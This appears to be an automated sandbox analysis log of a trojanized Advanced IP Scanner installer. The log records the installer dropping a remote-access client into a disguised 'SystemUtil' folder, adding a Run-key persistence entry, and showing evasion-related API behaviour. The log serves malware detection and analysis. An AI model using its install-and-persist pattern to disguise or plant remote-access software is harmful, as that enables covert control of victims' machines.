                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-P2PON.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-V71S3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-QVRL0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\is-RT7U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,7_2_685A7030
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685950E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_685950E0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68595117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,7_2_68595117
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68595490 GetPrivateProfileIntA,7_2_68595490
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network ToolsJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnkJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

Hooking and other Techniques for Hiding and Protection

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,8_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,8_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,8_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,8_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,8_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: C:\Users\user\Desktop\KC0uZWwr8p.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685991F0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_685A4F30
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle (7_2_11127110)
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle (8_2_11127110)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7569
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2088
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Window / User API: threadDelayed 3279
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Window / User API: threadDelayed 4979
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MH1O8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-LEVQP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5URF2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-92N74.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MB1RQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-OESQ5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-L4L9S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-56HU1.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QDVS6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IVQT8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2QTH6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-A7U9L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-V3C3T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-U7801.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-PELB8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)
